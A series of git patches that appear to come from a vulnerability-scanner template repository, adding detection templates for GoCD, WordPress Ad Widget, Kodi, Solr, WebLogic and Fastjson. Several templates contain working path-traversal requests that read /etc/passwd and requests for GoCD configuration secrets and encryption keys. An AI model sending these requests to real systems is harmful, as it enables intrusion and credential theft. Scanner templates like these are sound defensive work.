"{{BaseURL}}/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" From 0ac7e92ac9bc181d9d038d3abc17d8d8fe5303d3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Nov 2021 01:41:25 +0530 Subject: [PATCH 3395/4083] Update pre-auth-rce-gocd.yaml --- misconfiguration/pre-auth-rce-gocd.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/misconfiguration/pre-auth-rce-gocd.yaml b/misconfiguration/pre-auth-rce-gocd.yaml index 7b60ad5820..76d4449067 100644 --- a/misconfiguration/pre-auth-rce-gocd.yaml +++ b/misconfiguration/pre-auth-rce-gocd.yaml @@ -6,7 +6,6 @@ info: severity: critical reference: https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140 tags: go,rce,intrusive - description: "An issue was discovered in rConfig 3.9.2. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution." requests: - method: GET From 7a60f45431f0f538160a066330199fad5a014352 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Nov 2021 01:46:11 +0530 Subject: [PATCH 3396/4083] Update pre-auth-rce-gocd.yaml --- misconfiguration/pre-auth-rce-gocd.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/misconfiguration/pre-auth-rce-gocd.yaml b/misconfiguration/pre-auth-rce-gocd.yaml index 76d4449067..7f85cf3bab 100644 --- a/misconfiguration/pre-auth-rce-gocd.yaml +++ b/misconfiguration/pre-auth-rce-gocd.yaml @@ -1,11 +1,11 @@ -id: pre-auth-rce-gocd +id: go-cd-arbitrary-file info: - name: Pre-Auth Takeover of Build Pipelines in GoCD + name: GoCD Arbitrary File author: dhiyaneshDk severity: critical reference: https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140 - tags: go,rce,intrusive + tags: go,rce,intrusive,lfi requests: - method: GET From db91642c3d2042c06bcaafcda3fb887051087dcc Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Nov 2021 01:48:25 +0530 Subject: [PATCH 3397/4083] Rename pre-auth-rce-gocd.yaml to go-cd-arbitrary-file.yaml --- .../{pre-auth-rce-gocd.yaml => go-cd-arbitrary-file.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename misconfiguration/{pre-auth-rce-gocd.yaml => go-cd-arbitrary-file.yaml} (100%) diff --git a/misconfiguration/pre-auth-rce-gocd.yaml b/misconfiguration/go-cd-arbitrary-file.yaml similarity index 100% rename from misconfiguration/pre-auth-rce-gocd.yaml rename to misconfiguration/go-cd-arbitrary-file.yaml From 2e7ab374ebf4f832ff418f6c98b3176d309b2136 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Nov 2021 01:54:26 +0530 Subject: [PATCH 3398/4083] Create gocd-server-configuration.yaml --- .../gocd-server-configuration.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 misconfiguration/gocd-server-configuration.yaml diff --git a/misconfiguration/gocd-server-configuration.yaml b/misconfiguration/gocd-server-configuration.yaml new file mode 100644 index 0000000000..cc8bf35f1e --- /dev/null +++ b/misconfiguration/gocd-server-configuration.yaml @@ -0,0 +1,26 @@ +id: gocd-server-configuration + +info: + name: GoCd Server Configuration + author: dhiyaneshDk + severity: high + reference: https://attackerkb.com/topics/ShpnUFlqDz/pre-auth-takeover-of-build-pipelines-in-gocd + tags: go,lfi,gocd + +requests: + - method: GET + path: + - "{{BaseURL}}/go/add-on/business-continuity/api/cruise_config" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "server agentAutoRegisterKey" + - "webhookSecret" + - "tokenGenerationKey" + part: body From 5d7e8f72def91fa66ee76db4ea642fd9c179d533 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Nov 2021 02:12:33 +0530 Subject: [PATCH 3399/4083] Update gocd-server-configuration.yaml --- misconfiguration/gocd-server-configuration.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/misconfiguration/gocd-server-configuration.yaml b/misconfiguration/gocd-server-configuration.yaml index cc8bf35f1e..1ec82d5a23 100644 --- a/misconfiguration/gocd-server-configuration.yaml +++ b/misconfiguration/gocd-server-configuration.yaml @@ -4,8 +4,13 @@ info: name: GoCd Server Configuration author: dhiyaneshDk severity: high - reference: https://attackerkb.com/topics/ShpnUFlqDz/pre-auth-takeover-of-build-pipelines-in-gocd + reference: + - https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50 + - https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover + - https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140 tags: go,lfi,gocd + metadata: + shodan-query: 'http.title:"Create a pipeline - Go"' requests: - method: GET From fd9ffceacdaa59fe722dffd2e1c631cf273c1700 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Nov 2021 02:13:15 +0530 Subject: [PATCH 3400/4083] Update and rename go-cd-arbitrary-file.yaml to gocd-arbitrary-file.yaml --- ...d-arbitrary-file.yaml => gocd-arbitrary-file.yaml} | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) rename misconfiguration/{go-cd-arbitrary-file.yaml => gocd-arbitrary-file.yaml} (52%) diff --git a/misconfiguration/go-cd-arbitrary-file.yaml b/misconfiguration/gocd-arbitrary-file.yaml similarity index 52% rename from misconfiguration/go-cd-arbitrary-file.yaml rename to misconfiguration/gocd-arbitrary-file.yaml index 7f85cf3bab..cb335405c4 100644 --- a/misconfiguration/go-cd-arbitrary-file.yaml +++ b/misconfiguration/gocd-arbitrary-file.yaml @@ -1,11 +1,16 @@ -id: go-cd-arbitrary-file +id: gocd-arbitrary-file info: name: GoCD Arbitrary File author: dhiyaneshDk severity: critical - reference: https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140 - tags: go,rce,intrusive,lfi + reference: + - https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50 + - https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover + - https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140 + tags: go,lfi,gocd + metadata: + shodan-query: 'http.title:"Create a pipeline - Go"' requests: - method: GET From bb2e3b1d38863377144fbcc016b0cb36718e1143 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Nov 2021 02:22:06 +0530 Subject: [PATCH 3401/4083] Create gocd-encryption-key.yaml --- misconfiguration/gocd-encryption-key.yaml | 34 +++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 misconfiguration/gocd-encryption-key.yaml diff --git a/misconfiguration/gocd-encryption-key.yaml b/misconfiguration/gocd-encryption-key.yaml new file mode 100644 index 0000000000..6c1f10fbc7 --- /dev/null +++ b/misconfiguration/gocd-encryption-key.yaml @@ -0,0 +1,34 @@ +id: gocd-encryption-key + +info: + name: GoCd Encryption Key + author: dhiyaneshDk + severity: low + reference: + - https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50 + - https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover + - https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140 + tags: go,lfi,gocd + metadata: + shodan-query: 'http.title:"Create a pipeline - Go"' + +requests: + - method: GET + path: + - "{{BaseURL}}/go/add-on/business-continuity/api/cipher.aes" + + matchers-condition: and + matchers: + + - type: status + status: + - 200 + + - type: regex + regex: + - "([a-z0-9]+)" + + extractors: + - type: regex + regex: + - "([a-z0-9]+)" From 62a629cda93bf8682bfb046f56d2b041f6b4ef35 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Nov 2021 02:27:08 +0530 Subject: [PATCH 3402/4083] Create gocd-unauth-dashboard.yaml --- misconfiguration/gocd-unauth-dashboard.yaml | 30 +++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 misconfiguration/gocd-unauth-dashboard.yaml diff --git a/misconfiguration/gocd-unauth-dashboard.yaml b/misconfiguration/gocd-unauth-dashboard.yaml new file mode 100644 index 0000000000..53e6548258 --- /dev/null +++ b/misconfiguration/gocd-unauth-dashboard.yaml @@ -0,0 +1,30 @@ +id: gocd-unauth-dashboard + +info: + name: GoCd Unauth Dashboard + author: dhiyaneshDk + severity: medium + tags: go,lfi,gocd + metadata: + shodan-query: 'http.title:"Create a pipeline - Go"' + +requests: + - method: GET + path: + - '{{BaseURL}}/go/admin/pipelines/create?group=defaultGroup' + matchers-condition: and + matchers: + - type: word + words: + - 'Create a pipeline - Go' + condition: and + part: body + + - type: word + words: + - "text/html" + part: header + + - type: status + status: + - 200 From d20914503b8303fdea5950d036f06f72094d7acc Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Nov 2021 02:29:17 +0530 Subject: [PATCH 3403/4083] Create gocd-workflow.yaml --- workflows/gocd-workflow.yaml | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 workflows/gocd-workflow.yaml diff --git a/workflows/gocd-workflow.yaml b/workflows/gocd-workflow.yaml new file mode 100644 index 0000000000..734b966995 --- /dev/null +++ b/workflows/gocd-workflow.yaml @@ -0,0 +1,13 @@ +id: gocd-workflow +info: + name: GoCD Security Checks + author: dhiyaneshDk + description: A simple workflow that runs all GoCD Pipeline related nuclei templates on a given target. + +workflows: + + - template: technologies/tech-detect.yaml + matchers: + - name: gocd + subtemplates: + - tags: gocd From 99ba23f9af2131ddd4c5a9d99f2636fe90038bb4 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 5 Nov 2021 02:29:38 +0530 Subject: [PATCH 3404/4083] misc update --- misconfiguration/{ => gocd}/gocd-arbitrary-file.yaml | 0 misconfiguration/{ => gocd}/gocd-encryption-key.yaml | 0 misconfiguration/{ => gocd}/gocd-server-configuration.yaml | 2 +- misconfiguration/{ => gocd}/gocd-unauth-dashboard.yaml | 7 +++---- 4 files changed, 4 insertions(+), 5 deletions(-) rename misconfiguration/{ => gocd}/gocd-arbitrary-file.yaml (100%) rename misconfiguration/{ => gocd}/gocd-encryption-key.yaml (100%) rename misconfiguration/{ => gocd}/gocd-server-configuration.yaml (97%) rename misconfiguration/{ => gocd}/gocd-unauth-dashboard.yaml (89%) diff --git a/misconfiguration/gocd-arbitrary-file.yaml b/misconfiguration/gocd/gocd-arbitrary-file.yaml similarity index 100% rename from misconfiguration/gocd-arbitrary-file.yaml rename to misconfiguration/gocd/gocd-arbitrary-file.yaml diff --git a/misconfiguration/gocd-encryption-key.yaml b/misconfiguration/gocd/gocd-encryption-key.yaml similarity index 100% rename from misconfiguration/gocd-encryption-key.yaml rename to misconfiguration/gocd/gocd-encryption-key.yaml diff --git a/misconfiguration/gocd-server-configuration.yaml b/misconfiguration/gocd/gocd-server-configuration.yaml similarity index 97% rename from misconfiguration/gocd-server-configuration.yaml rename to misconfiguration/gocd/gocd-server-configuration.yaml index 1ec82d5a23..d483268576 100644 --- a/misconfiguration/gocd-server-configuration.yaml +++ b/misconfiguration/gocd/gocd-server-configuration.yaml @@ -28,4 +28,4 @@ requests: - "server agentAutoRegisterKey" - "webhookSecret" - "tokenGenerationKey" - part: body + condition: and diff --git a/misconfiguration/gocd-unauth-dashboard.yaml b/misconfiguration/gocd/gocd-unauth-dashboard.yaml similarity index 89% rename from misconfiguration/gocd-unauth-dashboard.yaml rename to misconfiguration/gocd/gocd-unauth-dashboard.yaml index 53e6548258..1a6b1d079e 100644 --- a/misconfiguration/gocd-unauth-dashboard.yaml +++ b/misconfiguration/gocd/gocd-unauth-dashboard.yaml @@ -4,7 +4,7 @@ info: name: GoCd Unauth Dashboard author: dhiyaneshDk severity: medium - tags: go,lfi,gocd + tags: go,gocd,unauth metadata: shodan-query: 'http.title:"Create a pipeline - Go"' @@ -12,18 +12,17 @@ requests: - method: GET path: - '{{BaseURL}}/go/admin/pipelines/create?group=defaultGroup' + matchers-condition: and matchers: - type: word words: - 'Create a pipeline - Go' - condition: and - part: body - type: word + part: header words: - "text/html" - part: header - type: status status: From 44634b53466b509b23b4a838c467bb731357cfef Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Nov 2021 02:49:38 +0530 Subject: [PATCH 3405/4083] Create gocd-login.yaml --- exposed-panels/gocd-login.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/gocd-login.yaml diff --git a/exposed-panels/gocd-login.yaml b/exposed-panels/gocd-login.yaml new file mode 100644 index 0000000000..510b55cad8 --- /dev/null +++ b/exposed-panels/gocd-login.yaml @@ -0,0 +1,24 @@ +id: gocd-login + +info: + name: GoCD Login + author: dhiyaneshDK + severity: info + tags: go,panel,gocd + metadata: + shodan-query: 'html:"GoCD Version"' + +requests: + - method: GET + path: + - '{{BaseURL}}/go/auth/login' + + matchers-condition: and + matchers: + - type: word + words: + - 'Login - Go' + - 'gocd-params' + - type: status + status: + - 200 From 134c27219d2698b00585dfd7c115c0b50564e3f7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Nov 2021 02:51:18 +0530 Subject: [PATCH 3406/4083] Update gocd-arbitrary-file.yaml --- misconfiguration/gocd/gocd-arbitrary-file.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/gocd/gocd-arbitrary-file.yaml b/misconfiguration/gocd/gocd-arbitrary-file.yaml index cb335405c4..a8c59aad71 100644 --- a/misconfiguration/gocd/gocd-arbitrary-file.yaml +++ b/misconfiguration/gocd/gocd-arbitrary-file.yaml @@ -11,7 +11,7 @@ info: tags: go,lfi,gocd metadata: shodan-query: 'http.title:"Create a pipeline - Go"' - + shodan-query: 'html:"GoCD Version"' requests: - method: GET path: From 2e4e27cb694740f68f3289baa20133f2a669a483 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Nov 2021 02:51:39 +0530 Subject: [PATCH 3407/4083] Update gocd-encryption-key.yaml --- misconfiguration/gocd/gocd-encryption-key.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/gocd/gocd-encryption-key.yaml b/misconfiguration/gocd/gocd-encryption-key.yaml index 6c1f10fbc7..e7bdde0752 100644 --- a/misconfiguration/gocd/gocd-encryption-key.yaml +++ b/misconfiguration/gocd/gocd-encryption-key.yaml @@ -11,7 +11,7 @@ info: tags: go,lfi,gocd metadata: shodan-query: 'http.title:"Create a pipeline - Go"' - + shodan-query: 'html:"GoCD Version"' requests: - method: GET path: From 2e4ca64ca76bc28bca7ef15fa07ba92720e57b2b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Nov 2021 02:51:48 +0530 Subject: [PATCH 3408/4083] Update gocd-server-configuration.yaml --- misconfiguration/gocd/gocd-server-configuration.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/gocd/gocd-server-configuration.yaml b/misconfiguration/gocd/gocd-server-configuration.yaml index d483268576..3e2ccba90f 100644 --- a/misconfiguration/gocd/gocd-server-configuration.yaml +++ b/misconfiguration/gocd/gocd-server-configuration.yaml @@ -11,7 +11,7 @@ info: tags: go,lfi,gocd metadata: shodan-query: 'http.title:"Create a pipeline - Go"' - + shodan-query: 'html:"GoCD Version"' requests: - method: GET path: From 3736a5ccc90c45e9fd25e1e7488ecafd57c924e0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Nov 2021 02:51:56 +0530 Subject: [PATCH 3409/4083] Update gocd-unauth-dashboard.yaml --- misconfiguration/gocd/gocd-unauth-dashboard.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/gocd/gocd-unauth-dashboard.yaml b/misconfiguration/gocd/gocd-unauth-dashboard.yaml index 1a6b1d079e..b971f73ee8 100644 --- a/misconfiguration/gocd/gocd-unauth-dashboard.yaml +++ b/misconfiguration/gocd/gocd-unauth-dashboard.yaml @@ -7,7 +7,7 @@ info: tags: go,gocd,unauth metadata: shodan-query: 'http.title:"Create a pipeline - Go"' - + shodan-query: 'html:"GoCD Version"' requests: - method: GET path: From b2eceeff1afd2ca9c0f3dc0b5ff263ea4e9e9016 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 5 Nov 2021 02:56:16 +0530 Subject: [PATCH 3410/4083] syntax update --- misconfiguration/gocd/gocd-arbitrary-file.yaml | 4 ++-- misconfiguration/gocd/gocd-encryption-key.yaml | 4 ++-- misconfiguration/gocd/gocd-server-configuration.yaml | 4 ++-- misconfiguration/gocd/gocd-unauth-dashboard.yaml | 4 ++-- 4 files changed, 8 insertions(+), 8 deletions(-) diff --git a/misconfiguration/gocd/gocd-arbitrary-file.yaml b/misconfiguration/gocd/gocd-arbitrary-file.yaml index a8c59aad71..142eeb0f3b 100644 --- a/misconfiguration/gocd/gocd-arbitrary-file.yaml +++ b/misconfiguration/gocd/gocd-arbitrary-file.yaml @@ -10,8 +10,8 @@ info: - https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140 tags: go,lfi,gocd metadata: - shodan-query: 'http.title:"Create a pipeline - Go"' - shodan-query: 'html:"GoCD Version"' + shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version" + requests: - method: GET path: diff --git a/misconfiguration/gocd/gocd-encryption-key.yaml b/misconfiguration/gocd/gocd-encryption-key.yaml index e7bdde0752..094685f494 100644 --- a/misconfiguration/gocd/gocd-encryption-key.yaml +++ b/misconfiguration/gocd/gocd-encryption-key.yaml @@ -10,8 +10,8 @@ info: - https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140 tags: go,lfi,gocd metadata: - shodan-query: 'http.title:"Create a pipeline - Go"' - shodan-query: 'html:"GoCD Version"' + shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version" + requests: - method: GET path: diff --git a/misconfiguration/gocd/gocd-server-configuration.yaml b/misconfiguration/gocd/gocd-server-configuration.yaml index 3e2ccba90f..42bd771332 100644 --- a/misconfiguration/gocd/gocd-server-configuration.yaml +++ b/misconfiguration/gocd/gocd-server-configuration.yaml @@ -10,8 +10,8 @@ info: - https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140 tags: go,lfi,gocd metadata: - shodan-query: 'http.title:"Create a pipeline - Go"' - shodan-query: 'html:"GoCD Version"' + shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version" + requests: - method: GET path: diff --git a/misconfiguration/gocd/gocd-unauth-dashboard.yaml b/misconfiguration/gocd/gocd-unauth-dashboard.yaml index b971f73ee8..16b3d7dd07 100644 --- a/misconfiguration/gocd/gocd-unauth-dashboard.yaml +++ b/misconfiguration/gocd/gocd-unauth-dashboard.yaml @@ -6,8 +6,8 @@ info: severity: medium tags: go,gocd,unauth metadata: - shodan-query: 'http.title:"Create a pipeline - Go"' - shodan-query: 'html:"GoCD Version"' + shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version" + requests: - method: GET path: From ec0fbef644df628729ba32e3c65596b6d1e1f318 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 5 Nov 2021 02:57:15 +0530 Subject: [PATCH 3411/4083] workflow update --- workflows/gocd-workflow.yaml | 9 +++------ 1 file changed, 3 insertions(+), 6 deletions(-) diff --git a/workflows/gocd-workflow.yaml b/workflows/gocd-workflow.yaml index 734b966995..561cecc9a6 100644 --- a/workflows/gocd-workflow.yaml +++ b/workflows/gocd-workflow.yaml @@ -5,9 +5,6 @@ info: description: A simple workflow that runs all GoCD Pipeline related nuclei templates on a given target. workflows: - - - template: technologies/tech-detect.yaml - matchers: - - name: gocd - subtemplates: - - tags: gocd + - template: exposed-panels/gocd-login.yaml + subtemplates: + - tags: gocd \ No newline at end of file From 6e6ed28504fe3b2175f7fd6ee961658b8d3bf3e6 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 5 Nov 2021 03:07:43 +0530 Subject: [PATCH 3412/4083] lint fix --- ...-version-detection.yaml => fastjson-version.yaml} | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) rename technologies/{fastjson-version-detection.yaml => fastjson-version.yaml} (68%) diff --git a/technologies/fastjson-version-detection.yaml b/technologies/fastjson-version.yaml similarity index 68% rename from technologies/fastjson-version-detection.yaml rename to technologies/fastjson-version.yaml index fa43434a0e..76a32349e4 100644 --- a/technologies/fastjson-version-detection.yaml +++ b/technologies/fastjson-version.yaml @@ -1,13 +1,12 @@ -id: fastjson-version-detection +id: fastjson-version info: name: Fastjson Version Detection author: yuansec severity: info description: If the server returns an exception to the client,The fastjson version will be retrieved,Fastjson versions greater than 1.2.41,Contains the latest version(1.2.76). - reference: - - https://blog.csdn.net/caiqiiqi/article/details/107907489 - tags: fastjson,version,version detection + reference: https://blog.csdn.net/caiqiiqi/article/details/107907489 + tags: fastjson,tech requests: - raw: @@ -20,7 +19,6 @@ requests: matchers: - type: word - part: body + part: body words: - - "fastjson-version" - + - "fastjson-version" \ No newline at end of file From e8115d32e90bd38de743e69524fb5f62dddd6360 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 4 Nov 2021 18:57:21 -0300 Subject: [PATCH 3413/4083] Update solr-exposure.yaml --- exposed-panels/solr-exposure.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposed-panels/solr-exposure.yaml b/exposed-panels/solr-exposure.yaml index fd452ca000..c6107999a2 100644 --- a/exposed-panels/solr-exposure.yaml +++ b/exposed-panels/solr-exposure.yaml @@ -4,7 +4,7 @@ info: name: Apache Solr Exposure author: pdteam severity: medium - tags: panel + tags: panel,solr requests: - method: GET @@ -13,4 +13,4 @@ requests: matchers: - type: word words: - - "Solr Admin" \ No newline at end of file + - "Solr Admin" From e1d1636c94d0b8a583e87f74d59ce487da281fe4 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Fri, 5 Nov 2021 07:46:27 +0900 Subject: [PATCH 3414/4083] Create wp-plugin-ad-widget-lfi.yaml --- wp-plugin-ad-widget-lfi.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 wp-plugin-ad-widget-lfi.yaml diff --git a/wp-plugin-ad-widget-lfi.yaml b/wp-plugin-ad-widget-lfi.yaml new file mode 100644 index 0000000000..c697b2a393 --- /dev/null +++ b/wp-plugin-ad-widget-lfi.yaml @@ -0,0 +1,26 @@ +id: wp-plugin-ad-widget-lfi +info: + name: WordPress Plugin WordPress Ad Widget Local File Inclusion (2.11.0) + author: 0x_Akoko + severity: high + description: Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. + reference: + - https://cxsecurity.com/issue/WLB-2017100084 + - https://plugins.trac.wordpress.org/changeset/1628751/ad-widget + tags: wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 855f92d0d2a365efb8c489904919d0b79c60ae5d Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Fri, 5 Nov 2021 07:49:01 +0900 Subject: [PATCH 3415/4083] Create CVE-2017-5982.yaml --- CVE-2017-5982.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 CVE-2017-5982.yaml diff --git a/CVE-2017-5982.yaml b/CVE-2017-5982.yaml new file mode 100644 index 0000000000..1f114f79b3 --- /dev/null +++ b/CVE-2017-5982.yaml @@ -0,0 +1,31 @@ +id: CVE-2017-5982 +info: + name: Kodi 17.1 Local File Inclusion + author: 0x_Akoko + severity: high + description: Insufficient validation of user input is performed on this URL resulting in a local file inclusion vulnerability. + reference: + - https://cxsecurity.com/issue/WLB-2017020164 + - https://www.cvedetails.com/cve/CVE-2017-5982 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2017-5982 + cwe-id: CWE-98 + tags: cve,cve2017,kodi,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From e76ee56dbf705b330194e95aec2270fe52ac3202 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 4 Nov 2021 19:56:24 -0300 Subject: [PATCH 3416/4083] Update solr-exposure.yaml I'm sorry for the last incomplete commit. Later on I realized an extractor could be added. ``nuclei -t exposed-panels/solr-exposure.yaml -u http://116.198.24.133/`` --- exposed-panels/solr-exposure.yaml | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/exposed-panels/solr-exposure.yaml b/exposed-panels/solr-exposure.yaml index c6107999a2..38dae825a4 100644 --- a/exposed-panels/solr-exposure.yaml +++ b/exposed-panels/solr-exposure.yaml @@ -5,12 +5,24 @@ info: author: pdteam severity: medium tags: panel,solr + metadata: + shodan-query: https://www.shodan.io/search?query=http.title%3A%22Solr+Admin%22 requests: - method: GET path: - '{{BaseURL}}/solr/' + - '{{BaseURL}}/' + + stop-at-first-match: true matchers: - type: word + name: title words: - "Solr Admin" + extractors: + - type: regex + part: body + group: 1 + regex: + - 'favicon\.ico\?_=([0-9.]+)' From 8eb67ca3f7cae837f60ecfc880c07c009c3d812f Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 5 Nov 2021 04:48:10 +0530 Subject: [PATCH 3417/4083] additional matcher --- cves/2017/CVE-2017-10271.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2017/CVE-2017-10271.yaml b/cves/2017/CVE-2017-10271.yaml index 87b674f5d8..4af42b1f0f 100644 --- a/cves/2017/CVE-2017-10271.yaml +++ b/cves/2017/CVE-2017-10271.yaml @@ -49,8 +49,13 @@ requests: + matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the DNS interaction words: - "dns" + + - type: status + status: + - 500 \ No newline at end of file From 3ddbc1e3342ba4b1ff76c537c2b7fa9988e6e966 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 5 Nov 2021 04:58:16 +0530 Subject: [PATCH 3418/4083] misc update --- exposed-panels/solr-exposure.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/exposed-panels/solr-exposure.yaml b/exposed-panels/solr-exposure.yaml index 38dae825a4..9bfed42a5f 100644 --- a/exposed-panels/solr-exposure.yaml +++ b/exposed-panels/solr-exposure.yaml @@ -6,20 +6,20 @@ info: severity: medium tags: panel,solr metadata: - shodan-query: https://www.shodan.io/search?query=http.title%3A%22Solr+Admin%22 + shodan-query: http.title:"Solr Admin" requests: - method: GET path: - '{{BaseURL}}/solr/' - - '{{BaseURL}}/' - + - '{{BaseURL}}' + stop-at-first-match: true matchers: - type: word - name: title words: - "Solr Admin" + extractors: - type: regex part: body From 14bce55ec47fb894f8f3620ca1541a42056f8c32 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 5 Nov 2021 05:22:04 +0530 Subject: [PATCH 3419/4083] moved panel detection template to exposed-panels --- exposed-panels/weblogic-login.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/weblogic-login.yaml diff --git a/exposed-panels/weblogic-login.yaml b/exposed-panels/weblogic-login.yaml new file mode 100644 index 0000000000..2bffdd15a7 --- /dev/null +++ b/exposed-panels/weblogic-login.yaml @@ -0,0 +1,24 @@ +id: weblogic-login + +info: + name: Weblogic Login Panel + author: bing0o + severity: info + tags: panel,weblogic + metadata: + shodan-query: product:"Oracle Weblogic" + +requests: + - method: GET + path: + - "{{BaseURL}}/console/login/LoginForm.jsp" + + matchers-condition: and + matchers: + - type: word + words: + - "WebLogic" + + - type: status + status: + - 200 \ No newline at end of file From ef5b606a786806e3c28d8e931260ca780e682f6e Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 5 Nov 2021 05:22:20 +0530 Subject: [PATCH 3420/4083] Added weblogic detection template --- technologies/weblogic-detect.yaml | 15 ++++++++++++--- 1 file changed, 12 insertions(+), 3 deletions(-) diff --git a/technologies/weblogic-detect.yaml b/technologies/weblogic-detect.yaml index 4effb62c55..1b245db0e3 100644 --- a/technologies/weblogic-detect.yaml +++ b/technologies/weblogic-detect.yaml @@ -2,16 +2,25 @@ id: weblogic-detect info: name: Detect Weblogic - author: bing0o + author: pdteam severity: info tags: tech,weblogic + metadata: + shodan-query: product:"Oracle Weblogic" requests: - method: GET path: - - "{{BaseURL}}/console/login/LoginForm.jsp" + - "{{BaseURL}}/{{randstr}}" + matchers-condition: and matchers: - type: word words: - - "WebLogic" + - "From RFC 2068" + - "Error 404--Not Found" + condition: and + + - type: status + status: + - 404 \ No newline at end of file From eef5252cc52cf0d2a75ecb65a69e988a3407c526 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 5 Nov 2021 06:01:59 +0530 Subject: [PATCH 3421/4083] file name update --- .../{vanguard-post-xss => other/vanguard-post-xss.yaml} | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) rename vulnerabilities/{vanguard-post-xss => other/vanguard-post-xss.yaml} (86%) diff --git a/vulnerabilities/vanguard-post-xss b/vulnerabilities/other/vanguard-post-xss.yaml similarity index 86% rename from 